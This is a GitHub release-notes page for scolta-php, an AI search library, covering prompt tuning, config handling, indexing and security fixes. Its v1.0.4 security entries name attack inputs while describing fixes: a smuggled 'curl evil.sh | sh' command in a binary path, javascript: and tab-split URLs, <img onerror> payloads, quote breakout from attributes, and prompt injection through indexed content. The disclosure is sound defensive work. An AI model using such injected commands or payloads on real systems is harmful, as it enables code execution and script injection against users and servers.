Releases: tag1consulting/scolta-php

v1.0.4

26 Jun 06:59
b2baf5a

Fixed

  • AI sort-intent no longer fires on a hard sort word buried in a conversational/descriptive query (src/Http/AiEndpointHandler.php, appendSortableFieldsInstruction()). Regression (terra-collecta, 2026-06-17): the query "I am looking for a gift for my friend who likes the cheapest handmade items" returned sort_hint: {field: "price", direction: "asc"} — but "cheapest" there describes the items the friend likes, not a request to order results by price; the user wants gift ideas, not a price-sorted list. The SORT INTENT prompt block already carried the buried-phrase/unsorted-list litmus guidance, but its only negative gift example used the soft qualifier "affordable", so the model let STEP 4's hard-word mapping (cheapest → price asc) override the conversational frame. The prompt now adds an explicit hard-word buried negative example (the exact failing gift query) plus two STEP 3 descriptive-frame bullets, and states that a hard sort word (cheapest, most expensive, newest, oldest, longest, …) embedded in a conversational/descriptive frame is STILL NOT primary sort intent — the framing overrides the STEP 4 word→field mapping. STEP 4 fires only when ordering results is the query's whole point. This is an LLM-adherence fix: it tightens the prompt without changing the parser. The prompt-construction tests assert the new guidance strings are present; a committed tests/fixtures/sort-intent-eval.json battery tracks the failing query, 3 buried-conversational variants (expectSort: null), and the true-positive controls (most expensive stone→price desc, cheapest crystals→price asc, bare cheapest→price asc, pierres les moins chères→price asc, newest posts/latest news→date desc, oldest articles→date asc) — final verification is the browser regression re-run against the live model, since CI cannot drive the LLM deterministically.
  • Dev-only files no longer ship in the Composer dist archive (.gitattributes, scripts/validate-dist-archive.sh). git archive HEAD (the tarball Composer downloads for a GitHub-hosted package) was still shipping phpstan.neon, phpstan-baseline.neon, and the tools/stemmer-golden Rust golden-data generator (a dev/CI-only stem oracle) to every Composer consumer: the PHPStan-config entry below claimed both neon files were excluded, but no export-ignore line backed the claim, and tools/ was never excluded at all. Added export-ignore for /phpstan.neon, /phpstan-baseline.neon, and /tools, so the published package is smaller and carries no dev tooling — none of the three is loaded at runtime (src/, templates/, assets/{js,css,wasm} are untouched). The dist-archive gate is tightened to match: the three move out of the top-level allowlist into the excluded-paths mirror, so the gate now asserts they are absent and any reappearance fails CI.
  • Auto-provisioned Amazee credentials stored without resolved model names no longer leave AI permanently broken (src/AiProvider/Amazee/AutoProvisioner.php). Provisioning persists credentials and resolves model names as two non-atomic steps (AmazeeTrialProvisioner::provision() stores the token+url, then calls /model/info). When the model-info call fails, getAvailableModels() swallows the error and returns [], so the $onModelsResolved gate never fires and no model name is persisted — but ConfigStorageInterface::load() requires only token+url, so it reports the half-provisioned credentials as valid. ensureAiAvailable() then short-circuited on load() !== null on every subsequent request and never re-resolved, so the caller fell back to the dated config default (claude-sonnet-4-5-20250929) which the Amazee LiteLLM gateway rejects with HTTP 400 "Invalid model name" — failing AI silently (summarize returns {}, expand returns an unexpanded 200) with no self-recovery. This is outside KeyExpiryRecovery's remit, which handles only auth-class failures. ensureAiAvailable() now accepts an optional $hasResolvedModels predicate: when stored credentials exist but the caller reports models are still unresolved, model resolution is re-attempted against the already-stored key (never a fresh trial, which would waste a server-limited allocation) and $onModelsResolved fires with the result, so the incomplete-provision state self-heals on the next lazy-init pass. Without the predicate the historical no-op is unchanged. A regression test drives the full provision → failed-resolution → store → re-resolve sequence. (The dated-default fallback itself lives in the platform adapters' client construction, which adopt the predicate when they re-vendor.)
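The self-healing flow in the last entry can be sketched as follows. This is an illustrative JavaScript rendering of the control flow only; the real code is PHP in AutoProvisioner.php, and load, provision, and resolveModels are hypothetical stand-ins for the storage and provisioner calls named above.

```javascript
// Illustrative sketch, not the library's implementation.
// load():            returns stored credentials or null (token + url only).
// provision():       obtains and stores fresh trial credentials.
// resolveModels(c):  returns model names, or [] when the lookup fails.
function ensureAiAvailable({ load, provision, resolveModels, onModelsResolved, hasResolvedModels }) {
  let credentials = load();
  if (credentials !== null) {
    // Without the optional predicate the historical no-op is preserved.
    const incomplete = typeof hasResolvedModels === 'function' && !hasResolvedModels();
    if (!incomplete) return credentials;
    // Otherwise fall through and re-resolve against the stored key;
    // no fresh trial is requested.
  } else {
    credentials = provision();
  }
  const models = resolveModels(credentials);
  // The callback fires only when names were actually resolved.
  if (models.length > 0) onModelsResolved(models);
  return credentials;
}
```

A caller would pass a predicate that reports whether model names are already persisted, so a half-provisioned state is retried on the next lazy-init pass without spending another trial allocation.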

Security

  • Configured Pagefind binary paths are now shell-escaped before execution (src/Binary/PagefindBinary.php). Both version() and the internal isExecutable() probe interpolated the binary path directly into exec($binary . ' --version 2>/dev/null'). The configured path can come from platform settings (admin forms, config files), so a value like /usr/bin/pagefind; curl evil.sh | sh executed a second command. A new public escapeShellCommand() helper applies escapeshellarg() to the whole path, special-casing known multi-word commands (npx pagefind is split and escaped per token so it still runs as command + argument). downloadTargetDir() also now throws on mkdir() failure instead of silently returning a directory that was never created. Regression tests assert the composed command string for metacharacter, command-substitution, embedded-space, and npx pagefind inputs — nothing is executed.
  • Markdown link URLs are scheme-gated on both renderers (src/Util/MarkdownRenderer.php + formatInline in assets/js/scolta.js). Both sides turned any [text](url) in AI output into a clickable link, so a javascript:/data: URL in a model response (or via prompt injection through indexed content) became a live link; the JS side's domain allowlist only engaged when allowedDomains was non-empty, i.e. it failed open in the default configuration. Both renderers now allow only absolute http(s) URLs and scheme-less relative paths, rendering everything else as plain text. Control characters and whitespace are stripped before scheme detection because browsers ignore them when parsing a scheme (jav\tascript: executes). The JS side additionally attribute-escapes the href (the summary text is escaped with escapeHtml, which leaves " intact, so a quote inside an otherwise-allowed URL could previously break out of the href attribute). Covered by PHPUnit tests (javascript:, data:, tab-split scheme, relative and http(s) controls) and JSDOM Jest tests driving the real rendering path.
  • Attribute interpolations in assets/js/scolta.js use a new quote-escaping escapeAttr(), and result-card hrefs are scheme-checked. escapeHtml() is a textContent → innerHTML round-trip that does not escape quotes, but it guarded attribute contexts: the LLM-generated expanded terms in data-scolta-search-term="…", filter dimension/value attributes on dismiss buttons and checkboxes, and the result-title title attribute — a value containing " could close the attribute and mint new ones (e.g. event handlers). Result cards also interpolated the raw ${url} into two hrefs, so a poisoned document URL like javascript:… became clickable. Every attribute interpolation now uses escapeAttr() (escapes &<>"'); escapeHtml() remains for text nodes. Result-card hrefs go through sanitizeUrlAttr(), which attribute-escapes allowed (http(s)/relative) URLs and renders anything else as inert #. JSDOM Jest regression tests (tests/js/security-render.test.js) prove a "-bearing expanded term cannot break out of its attribute and a javascript: result URL is not clickable.
  • stripHtml() in assets/js/scolta.js parses untrusted HTML in an inert document. It previously assigned untrusted excerpt/title HTML to innerHTML of a live detached <div>, whose subtree shares the page's document — resource-bearing elements (<img src onerror=…>) load eagerly there in real browsers. It now uses new DOMParser().parseFromString(text, 'text/html').body.textContent, which neither runs scripts nor loads resources. A Jest test drives an <img onerror> payload through the real render path, plus a structural pin that the function stays DOMParser-based (the behavioral test alone cannot catch a revert in JSDOM, which loads no resources either way).
  • FilesystemDriver::deleteDirectory() no longer follows symlinks (src/Storage/FilesystemDriver.php). The delete loop called rmdir/unlink on $item->getRealPath(), which resolves symlinks — deleting a retired index tree containing a planted (or accidental) symlink deleted the link target, potentially outside the tree (the recursive iterator does not follow links for traversal, but realpath re-introduced the hop at delete time). The loop now operates on getPathname() and unlinks links themselves (isLink() checked before the dir/file branch, since isDir() follows links too). A regression test builds a tree containing symlinks to an outside file and an outside directory and asserts both targets survive deletion. exists() also now calls validatePath() — it was the only driver method skipping the stream-wrapper guard every sibling applies.
  • Follow-up conversations enforce content-size caps (src/Http/AiEndpointHandler.php). handleFollowUp() validated roles and the message cadence but no sizes, while its sibling endpoints cap the query at 500 bytes and summarize context at 100k — a client could relay arbitrarily large payloads straight to the AI provider. Each message's content is now capped at 100,000 characters (mirroring the summarize context safety net, since the first user turn legitimately embeds search context) and the conversation total at 400,000 characters, both returning HTTP 400. The caps are measured in Unicode characters via `m...
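The scheme gate and attribute escaping described in the Markdown-link and result-card entries above can be sketched roughly as below. The helper names match those mentioned in the notes, but the bodies are an assumption written for illustration, not the code shipped in assets/js/scolta.js; isAllowedUrl is a hypothetical name.

```javascript
// Illustrative sketch only; not the shipped scolta.js implementation.

// Escape the characters that matter inside a quoted HTML attribute.
function escapeAttr(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Allow absolute http(s) URLs and scheme-less relative paths only.
function isAllowedUrl(url) {
  // Browsers ignore control characters and whitespace while parsing a
  // scheme, so remove them before looking for one.
  const compact = String(url).replace(/[\u0000-\u0020\u007f]/g, '');
  const match = compact.match(/^([a-zA-Z][a-zA-Z0-9+.-]*):/);
  if (!match) return true; // no scheme: treated as a relative path
  const scheme = match[1].toLowerCase();
  return scheme === 'http' || scheme === 'https';
}

// Attribute-escape allowed URLs; render anything else as an inert "#".
function sanitizeUrlAttr(url) {
  return isAllowedUrl(url) ? escapeAttr(url) : '#';
}
```

With this shape, a tab-split scheme such as "jav\tascript:" is rejected because detection runs on the stripped string, and a quote inside an otherwise allowed URL is escaped rather than closing the href attribute.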

v1.0.3

05 Jun 20:09
313e43e

Added

  • Regression snapshot test pinning the summarize CORPUS AWARENESS prompt bullet. A new test (testSummarizeCorpusAwarenessMatchesCanonicalSnapshot) reads tests/fixtures/corpus-awareness-bullet.txt and asserts the resolved 'summarize' template (DefaultPrompts::getTemplate()) contains that exact bullet byte-for-byte, guarding against silent drift (follow-up to the tag1consulting/scolta-core#33 corpus-statistic fix). The fixture is kept hand-identical to the matching bullet in scolta-core's SUMMARIZE constant. Test-only; no runtime change.
  • Category-member and context decomposition rules in the default expand_query prompt (tag1consulting/scolta-core#36). The 'expand_query' template (resolved server-side by DefaultPrompts for the AI path) gains two rules so the model decomposes a grouping into concrete terms instead of restating it as an abstract synonym: rule 13 (CATEGORY → MEMBERS) expands a category/family/region into its well-known members ("version control systems" → Git/Mercurial/Subversion; "Southeast Asian food" → Thai/Vietnamese/Indonesian), and rule 14 (CONTEXT / USE-CASE → CONCRETE ITEMS) expands a context/occasion into the item types that serve it ("home office setup" → standing desk/ergonomic chair/monitor arm). Both lead with non-food examples so the behavior generalizes across domains, and rule 13 forbids fabricating members for categories the model does not know — those fall back to normal alternate phrasings. The 2-4 term cap is reconciled to allow up to 6 concrete members when decomposing, and rule 7 is narrowed to taxonomy/filter-label matching so it no longer contradicts rule 13. Additive: queries that are not categories or contexts expand exactly as before. The template is byte-identical to scolta-core's EXPAND_QUERY constant; the browser-side WASM must be rebuilt downstream to match.
  • Round-robin AI-summary candidate selection across expansion sub-queries (#170). When a query fans out into distinct sub-topics of unequal corpus size (e.g. "traditional dishes from Southeast Asia" → Thai, Vietnamese, Indonesian, …), the relevance-union top-N that feeds the AI summarizer is filled entirely by the single largest sub-query, so the overview can only ever describe that one sub-topic. Two new browser-side config keys address this: expansionCombineMode (relevance_union default | round_robin) and expansionPerTermTopK (default 3). Under round_robin, scolta.js stamps each loaded result with the expansion sub-query that produced it (__scoltaSourceTerm), groups the summary candidate pool by that provenance, and deals the top-K from each sub-query in turn until aiSummaryTopN is filled — so the summarizer sees breadth across sub-topics. The reallocation stays within the existing aiSummaryTopN / aiSummaryMaxChars budgets and never exceeds them. The default relevance_union reproduces current behavior exactly, and the visible ranked result list is unchanged (always relevance-sorted) — round-robin only affects what the summarizer is shown. A single-sub-query pool (focused single-intent query) is identical to relevance_union.
  • ConfigReferenceDocTest — a CI guard that keeps docs/CONFIG_REFERENCE.md in sync with ScoltaConfig. The new test parses the property tables and preset table in CONFIG_REFERENCE.md and asserts that every documented scalar default equals the live ScoltaConfig default, that every scalar property is documented, and that every non-default preset override is documented with a matching value. It fails loudly if the tables can no longer be parsed, so a future doc reformat surfaces as a fixable failure rather than a silently-skipped check. This is the guard that would have caught the README default drift fixed in this release. The test also pins docs/TUNING.md: that guide restates the current global default for each scoring parameter it discusses (its **Config:** … — **Default: X** lines), and those restatements can drift independently of CONFIG_REFERENCE.md, so a new test_documented_tuning_guide_defaults_match_live_config asserts each one equals the live ScoltaConfig default too.
  • docs/TUNING.md — the canonical scoring-tuning evidence guide. Opens with a plain "choose your site type → preset" section for admins, then the full scoring-sweep evidence (precision-cliff data, per-parameter sweeps, methodology, and which defaults are still open findings) for maintainers. Cross-links CONFIG_REFERENCE.md for the property list and the site-type → preset table rather than duplicating them; CONFIG_REFERENCE.md's preset section now links back to it.
  • assets/ASSETS.sha256 manifest covering all duplicated front-end assets. The four browser assets duplicated into scolta-drupal and scolta-wp (js/scolta.js, css/scolta.css, wasm/scolta_core.js, wasm/scolta_core_bg.wasm) are now hashed into a single manifest, regenerated by the new composer update-asset-manifest script. The adapters drive both their dev-time copy and their CI drift guard from this one manifest, so a newly added asset can no longer be guarded in one place and forgotten in another. update-browser-wasm now regenerates the manifest after copying the WASM. The existing per-file assets/js/scolta.js.sha256 is retained (scolta-laravel's HealthController and StatusCommand read it at runtime as a bare hash) but is now derived from ASSETS.sha256 rather than hashed independently: update-js-checksum regenerates the manifest and then extracts the js/scolta.js line into the standalone file, so every asset SHA-256 comes from one computation and the two files can never diverge. A new AssetManifestTest fails CI if the committed manifest is stale, any listed asset is missing, the standalone checksum drifts from the manifest's js/scolta.js line, or that file stops being a bare 64-hex hash.
  • AiServiceAdapter::handlePossibleBudgetException() hook. The base message(), conversation(), and messageForOperation() methods now wrap their AI call in a try/catch (\RuntimeException) that invokes a new protected handlePossibleBudgetException() hook before re-throwing. The base hook is a no-op, so behavior is unchanged for callers; platform adapters (scolta-drupal, scolta-laravel, scolta-wp) override it to convert an Amazee budget-exhaustion error into AmazeeBudgetExceededException (and notify a budget handler) without each having to override all three AI methods. This removes the need for the three near-identical try/catch overrides duplicated in every adapter. Backward-compatible: an un-updated adapter that still overrides the three methods keeps working because the wrapper exception's message does not contain the Budget has been exceeded! guard string, so the doubled hook call is an idempotent no-op on the second pass.
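The round-robin candidate selection from #170 can be pictured with the sketch below. It is one plausible reading of "deals the top-K from each sub-query in turn", written for illustration: each sub-query contributes at most perTermTopK results, and one result per sub-query is dealt per round until topN is reached. The function name and option names are hypothetical; only __scoltaSourceTerm and the two mode names come from the notes above.

```javascript
// Illustrative sketch; not the shipped scolta.js code.
// `results` is assumed to be relevance-sorted already.
function selectSummaryCandidates(results, { mode = 'relevance_union', perTermTopK = 3, topN = 5 } = {}) {
  if (mode !== 'round_robin') return results.slice(0, topN);

  // Group by the expansion sub-query that produced each result,
  // keeping at most perTermTopK per group.
  const groups = new Map();
  for (const result of results) {
    const key = result.__scoltaSourceTerm;
    if (!groups.has(key)) groups.set(key, []);
    const group = groups.get(key);
    if (group.length < perTermTopK) group.push(result);
  }

  // A single-sub-query pool behaves exactly like relevance_union.
  if (groups.size <= 1) return results.slice(0, topN);

  // Deal one result per group per round until the budget is filled.
  const queues = [...groups.values()];
  const picked = [];
  for (let round = 0; picked.length < topN; round++) {
    let dealt = false;
    for (const queue of queues) {
      if (round < queue.length && picked.length < topN) {
        picked.push(queue[round]);
        dealt = true;
      }
    }
    if (!dealt) break; // every group is exhausted
  }
  return picked;
}
```

The selection never returns more than topN items, which matches the note that the reallocation stays inside the existing aiSummaryTopN budget; the visible result list is not touched by this step.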

Fixed

  • fromArray() now treats null as "not set," so adapters can fall through to a Site Type preset. The override loop previously assigned every key present in the input over the preset's values, with no way to express "this field is unset — use the preset." Adapters that omit a key (Drupal, WordPress) got preset fall-through for free, but an adapter whose config layer always emits a key for every field (notably Laravel's config/scolta.php) could never reach a preset's value — its concrete config default always won, leaving the entire Site Type preset (~12–15 scoring/display fields, not just expansionCombineMode) inert. fromArray() now skips any null value (null = "not set" → use the preset, or the base default when no preset is named); an explicit non-null value still overrides. This makes the unset contract explicit for every adapter and removes a latent TypeError (assigning null to a typed property previously threw). This is the central fix that enables adapters — especially Laravel — to honor presets; the Laravel config defaults switch to null in its own PR. CONFIG_REFERENCE.md documents the contract in prose.
  • AI summaries no longer truncate mid-sentence on multi-item results (#168). aiSummaryMaxTokens defaulted to 512, but max_tokens is a hard ceiling, not a target — a 6-item summary with one-sentence descriptions plus ad-hoc subcategory headers overran it and was cut at the token boundary mid-word. Two complementary fixes: the default is raised to 1024 (the prompt structurally bounds real output to ~300–600 tokens, so this adds headroom without inviting longer output), and the 'summarize' template's FORMAT RULES now state an explicit output-length budget — keep the summary under ~150 words, with a single flat bulleted list and no section/sub-category headers. The raised ceiling guarantees nothing is cut; the stated budget keeps natural output short. No preset overrides ai_summary_max_tokens below the default. The prompt line matches scolta-core's SUMMARIZE constant.
  • Removed the Wikipedia-specific corpus statistic from the default summarize prompt. The CORPUS AWARENESS rule in the 'summarize' template shipped a hard-coded "~6,900 Featured Articles" example that described only the Wikipedia demo, reached every site using the default prompt (the server resolves this template for the AI overview), and taught the model to fabricate corpus counts. The example is now count-free and frames gaps via the site description's scope, and the rule explicitly forbids inventing statistics (counts, totals, sizes). Matches the same change in scolta-core's SUMMARIZE constant (tag1consulting/scolta-core#33).
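The null-means-unset contract in the fromArray() entry above can be illustrated with a small sketch. It is written in JavaScript for consistency with the other examples here; the real method is PHP on ScoltaConfig, and the function name, the `preset` key, and the sample values are assumptions made for illustration.

```javascript
// Illustrative sketch of the "null = not set" override contract.
function configFromArray(input, presets, baseDefaults) {
  // Start from the base defaults, then layer the named preset (if any).
  const preset = presets[input.preset] ?? {};
  const config = { ...baseDefaults, ...preset };

  for (const [key, value] of Object.entries(input)) {
    if (key === 'preset') continue;
    // null means "not set": keep the preset value, or the base default
    // when no preset is named.
    if (value === null) continue;
    // Any explicit non-null value still overrides.
    config[key] = value;
  }
  return config;
}

// Hypothetical values: the adapter emits every key, but leaves
// recencyBoostMax as null so the preset can supply it.
const config = configFromArray(
  { preset: 'reference', recencyBoostMax: null, titleMatchBoost: 3 },
  { reference: { recencyBoostMax: 0 } },
  { recencyBoostMax: 0.25, titleMatchBoost: 2 }
);
```

Here the preset's recencyBoostMax survives because the input value is null, while the explicit titleMatchBoost wins over both the preset and the base default.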

Changed

  • **Facet panel is now index-driven and static, with exact typed-query counts that don't move on AI expansion or when you click a fac...

v1.0.2

03 Jun 06:41
e71c479

Removed

  • Reverted the entire query-word-importance line (#163 exemption + #164 ranking). Validation showed both layers were inert — the #164 incidentalMatchWeight re-ranking and the #163 semantic exemption gate changed result ordering on zero real queries. Removed: the query_word_importance plumbing into the WASM score_results input and the JS fallback weighting, the incidentalMatchWeight config, the aiQueryWordImportance flag, the expand-prompt classification instruction and its query_word_importance parsing in AiEndpointHandler, the contentWords exemption gate in scolta.js, and the bundled WASM that carried the scoring weight. The #156 frequency guard (#161) and the Fix A/D typed-query-term exemption + expandSubwordDenyList veto (#162) are unchanged — the browser tree is back to its #162 state, with the bundled WASM matching the reverted scolta-core.

Fixed

  • Sub-word frequency guard no longer drops words the user actually typed (#156 follow-up). The #156 guard used corpus frequency as a proxy for "non-discriminating / generic," but in a topical corpus a word is often high-frequency because it is the subject matter — the proxy conflates "common because central" with "common because generic." So searching spicy on a recipe corpus had its typed subject word (~6.4% of docs, above the 0.05/0.10 threshold) silently dropped from the decomposed expansion terms, collapsing recall. The frequency check is now bypassed for any sub-word that is a token of the user's actual query (Fix A), with a per-site expandSubwordDenyList veto for the rare word that is both typed and genuinely generic (Fix D). Non-query expansion-derived words (e.g. fried, tender) remain frequency-gated as before.
  • customStopWords now applied consistently in scolta.js (#156 follow-up). extractSearchTerms() previously filtered against only the built-in STOPWORDS set, so JS query tokenization ignored customStopWords while the WASM scorer honored it. JS now strips the union of STOPWORDS and customStopWords, matching WASM.
  • Broad multi-word queries recover the recall lost in v1.0.0 (closes #156). Commit 690a2288 removed the sub-word expansion block from scolta.js, causing broad-query result counts to drop 4–50× on high-overlap corpora. Sub-word expansion is reintroduced behind a corpus-frequency guard: a multi-word expansion term's constituent words are added as search terms only when each word's corpus frequency is below expandSubwordMaxFrequency (default 0.05; 0.10 for the content_catalog and none presets). This restores low-frequency domain words ("vegetarian", "cuisine") while blocking high-frequency noise ("recipes", "cooking") that polluted pre-v1.0.0 results. Frequency is measured against the same active filters the search uses (including the language partition when autoLanguageFilter is on), so the denominator matches the corpus actually being searched. The guard applies in both the relevance and native-sort code paths. Setting the threshold to 0 reproduces v1.0.0 (no sub-words); >= 1.0 reproduces the pre-v1.0.0 behavior (all sub-words).
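Taken together, the frequency guard, the typed-word exemption (Fix A), and the deny-list veto (Fix D) amount to a per-word decision that can be sketched as below. This is an assumption-laden illustration rather than the scolta.js implementation: allowedSubwords and frequencyOf are hypothetical names, and the handling of the 0 and >= 1 boundaries as early returns is a simplification of the documented behavior.

```javascript
// Illustrative sketch; not the shipped guard.
// frequencyOf(word) is a hypothetical lookup returning the fraction of
// searched documents that contain the word.
function allowedSubwords(expansionTerm, options) {
  const { queryTokens = [], frequencyOf, maxFrequency = 0.05, denyList = [] } = options;
  const words = expansionTerm.toLowerCase().split(/\s+/).filter(Boolean);

  // Only multi-word terms are decomposed; a threshold of 0 disables it.
  if (words.length < 2 || maxFrequency <= 0) return [];
  // A threshold of 1.0 or more admits every sub-word.
  if (maxFrequency >= 1) return words;

  const typed = new Set(queryTokens.map((t) => t.toLowerCase()));
  const denied = new Set(denyList.map((t) => t.toLowerCase()));

  return words.filter((word) => {
    // Fix A: words the user typed bypass the frequency check,
    // unless Fix D's deny list vetoes the exemption.
    const exempt = typed.has(word) && !denied.has(word);
    return exempt || frequencyOf(word) < maxFrequency;
  });
}
```

A denied word is not removed outright; it simply loses the exemption and is judged by frequency like any expansion-derived word, which is consistent with the note that the deny list does not affect scoring or tokenization.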

Added

  • expandSubwordDenyList config option (default []). Guard-only veto list for the sub-word query-term exemption (#156 follow-up). Words here are never auto-exempted from the sub-word frequency guard even when the user types them, so a site can stop a typed generic word (e.g. hot on a recipe corpus) from re-flooding results via the exemption. Unlike customStopWords this does NOT affect relevance scoring or query tokenization — the word stays searchable and scorable. Configurable via expand_subword_deny_list in all platform adapters.
  • expandSubwordMaxFrequency config option (default 0.05). Maximum corpus frequency (fraction of indexed documents) for a multi-word expansion term's constituent word to be added as a standalone search term. Configurable via expand_subword_max_frequency in all platform adapters. Presets content_catalog and none ship 0.10; reference, ecommerce, and blog use the 0.05 default. Set to 0 to disable sub-word expansion entirely.
  • Result-count baseline regression test (tests/js/result-count-baseline.test.js + tests/fixtures/result-count-baseline.json). Drives the real scolta.js guard against a synthetic corpus built from real measured frequencies and asserts merged result counts stay within a per-demo band, flagging both recall collapse (sub-word block removed) and precision spikes (high-frequency noise admitted). This is the regression guard whose absence let 690a2288 ship a silent count drop.
  • Sub-word frequency guard behavioral test (tests/js/subword-frequency-guard.test.js). Executes scolta.js against a recording Pagefind mock and asserts only sub-words below the threshold feed results, covering the boundary behaviors (0 and >= 1).

Changed

  • Opened 1.0.2-dev development cycle.
  • Scoring default tuning from the full-matrix sweep (120+ queries, 9 demos). crossListBonus default 0.15 -> 0.05 (a smaller tie-breaker that doesn't override single-source precision); recencyBoostMax default 0.5 -> 0.25, with preset overrides reference: 0, content_catalog: 0, and blog: 0.25 (recency adds noise on non-time-sensitive content); titleMatchBoost default 1.0 -> 2.0 (improves top-1 precision across all demos; already shipped in the reference/content_catalog presets). These are ranking-quality changes independent of the #156 recall fix.

v1.0.1

30 May 18:50
91cbd51

Fixed

  • Binary indexer now emits canonical URLs instead of build-artifact URLs. ContentExporter writes exported HTML files in a nested directory structure mirroring the canonical URL (/recipe/cake → recipe/cake/index.html) so Pagefind --site derives data.url identical to the PHP indexer. Previously, flat {id}.html exports caused data.url = /{id}.html, a path that 404s on the live site. Resolves the root cause behind #155 and closes #157.
  • AI summary citation URLs now prefer canonical meta.url over Pagefind file path. Both summarizeResults() (WASM path) and buildLLMContext() (JS fallback) now use r.data.meta?.url || resolveUrl(r.data.url), matching the pattern already used in the result card renderer. Fixes #155.
  • Added vendor/ to archive.exclude in composer.json to prevent dev vendor/ from leaking into dist archives when installed via Composer path repositories.
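The citation-URL fallback named in the second entry above is a one-line pattern. The sketch below wraps it in a hypothetical citationUrl helper; resolveUrl stands in for the existing scolta.js helper of that name, whose behavior is not shown in these notes, so it is passed in as a parameter.

```javascript
// Illustrative sketch of the meta.url-first pattern.
function citationUrl(result, resolveUrl) {
  // Prefer the canonical URL stored in metadata; fall back to the
  // Pagefind-derived path only when it is missing or empty.
  return result.data.meta?.url || resolveUrl(result.data.url);
}

// Hypothetical resolver used only for this example.
const toAbsolute = (path) => 'https://example.com' + path;
const withMeta = { data: { url: '/42.html', meta: { url: 'https://example.com/recipe/cake' } } };
const withoutMeta = { data: { url: '/recipe/cake/' } };
```

Calling citationUrl(withMeta, toAbsolute) yields the canonical meta URL, while citationUrl(withoutMeta, toAbsolute) falls back to the resolved Pagefind path.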

Added

  • ContentExporter::urlToExportPath() — maps a canonical URL to the export file path Pagefind will crawl. Shared by all platform adapters.
  • ContentExporter::countHtmlFiles() — recursive HTML file count, replacing flat glob('*.html') in adapters.
  • ContentExporter::writeManifest() / readManifest() — ID-to-path manifest for incremental deletes in the nested layout.
  • ContentExporter::deleteById() / deleteByUrl() — delete export files by item ID (manifest + flat fallback) or canonical URL.
  • Indexer URL parity test (IndexerUrlParityTest) that joins fragments by stable item ID and asserts data.url equality, collision detection, and urlToExportPath mapping correctness.
  • Citation URL structural tests in JS test suite — locks the meta.url || fallback pattern in both summary builders.
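To make the nested export layout concrete, here is a rough JavaScript illustration of the URL-to-path mapping that ContentExporter::urlToExportPath() is described as performing. The real method is PHP and may handle cases this sketch ignores (query strings, file extensions, encoding); exportPathForUrl is a hypothetical name and the placeholder base URL exists only so relative inputs can be parsed.

```javascript
// Illustrative sketch; not a port of the PHP method.
function exportPathForUrl(canonicalUrl) {
  // Parse absolute or root-relative URLs and keep only the path.
  const { pathname } = new URL(canonicalUrl, 'https://placeholder.invalid');
  // Drop leading and trailing slashes, then nest under index.html so a
  // static-site crawl sees the same path as the live site.
  const trimmed = pathname.replace(/^\/+|\/+$/g, '');
  return trimmed === '' ? 'index.html' : `${trimmed}/index.html`;
}
```

Under this mapping /recipe/cake is written to recipe/cake/index.html, which is the example given in the Fixed entry for this release.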

Documentation

  • Clarified independent versioning model. CLAUDE.md, CHANGELOG.md, and UPGRADE.md now state that minor and patch versions are released independently per package, with adapters pinning scolta-php via composer.lock within their ^1.x constraint. Added a comment to scripts/check-version-sync.php noting it is a local-only major check.

Upgrade notes

Binary-indexer sites must run a full rebuild after upgrading. The export layout changed from flat {id}.html to nested directories mirroring canonical URLs. A stale index will retain the old /{id}.html URLs that 404 on the live site. The health-check warning added in #158 will surface a pre-fix index automatically.

Scolta 1.0.0

27 May 15:46
043b70d

AI-powered search for Drupal, WordPress, and Laravel — now stable.

What is Scolta?

Scolta is an open-source, AI-powered search platform that replaces the default search on Drupal, WordPress, and Laravel sites with intelligent, semantic search. It uses a Rust/WASM core for scoring, query expansion, and relevance ranking, with a shared PHP library and thin CMS-specific adapters. Scolta is built by Tag1 Consulting and powered by Amazee.ai for AI infrastructure.

scolta-php is the shared PHP library that all CMS adapters depend on. It provides the PHP indexer, AI summary with streaming, query expansion, filter/sort infrastructure, and content management layer that powers every Scolta installation.

1.0.0 Stable Release

This is the foundation library that Drupal, WordPress, and Laravel packages build on. Highlights of the stable release:

  • PHP indexer with no binary dependency — index content using pure PHP
  • AI summary with streaming for real-time answer generation
  • expand_query with disambiguation for intelligent query rewriting
  • Filter/sort infrastructure with two-pass matching, subcategory support, and price sort patterns
  • Memory pressure handling with stream tokenization for large sites
  • API error handling (401/429/503) with graceful degradation
  • Amazee.ai provider support for managed AI infrastructure
  • E2E test suite covering the full search pipeline

Changes Since RC4

Search Quality

  • Subcategory matching in filter field descriptions
  • exactTitleMatchBoost config option for precise title relevance
  • crossListBonus config option for multi-index scoring
  • Expansion merge cross-list bonus scoring
  • Expansion phrases no longer word-exploded
  • Sort-intent fallback when Pagefind returns few results
  • Sort-without-filter fallback
  • Sort intent no-fallback rule

Filters and Facets

  • Filter exact-match-first (two-pass matching)
  • filter_hint canonicalization against Pagefind filters
  • Ascending price sort patterns recognized
  • Subject filter UI state updates (badges + checkboxes)
  • Multi-value filter array counting fix
  • Multi-value facet OR syntax fix
  • Facet count refresh after filter selection
  • Filter+sort discovery replacing intersection heuristic

AI Overview

  • AI Overview italic/bold+italic markdown rendering
  • Corpus-awareness in summarize/follow-up prompts
  • AI Summary reflects user-selected facet filters
  • StreamingFormatWriter multi-value filter fix

Indexer

  • PHP indexer memory reduction (stream tokenization)
  • Index completeness verification on exit
  • PhpIndexer sortable/metadata passthrough fix
  • Memory regression test for processChunk()

Infrastructure

  • Filter field description validation test

Full Changelog: https://github.com/tag1consulting/scolta-php/blob/v1.0.0/CHANGELOG.md

Getting Started

composer require tag1/scolta-php

Most users will install one of the CMS-specific packages (scolta-drupal, scolta-laravel, or scolta-wp), which pull in scolta-php automatically.

Scolta 1.0.0-rc4

18 May 11:39
19f1a52

Fourth release candidate for Scolta 1.0 — AI-powered search for Drupal, WordPress, and Laravel.

Highlights

Fixed

  • Expand-query prompt disambiguation — Rule 9 now uses the site's domain context to disambiguate multilingual queries before falling back to generic interpretation. A German query like "Zweig" on a Git docs site is now expanded to branch-related terms instead of famous authors.
  • Composer archive excludes tests/: composer.json archive.exclude prevents the ~4 MB stemmer corpus and fixtures from shipping in dist archives.
  • API error handling: AiClient now throws ApiKeyInvalidException (401) and RateLimitException (429 + Retry-After header) instead of wrapping all upstream errors as generic 503.
  • E2E test race condition: uniqid() collision on multi-vCPU CI fixed by appending getmypid() to state-directory names.
  • Foreign language "No Results Found" flash — UI now suppresses premature empty-state display while AI expansion is still translating/expanding the query.
  • Follow-up queries resolve numbered result references — "#6", "the third one", etc. now map to the correspondingly numbered entry in search context.
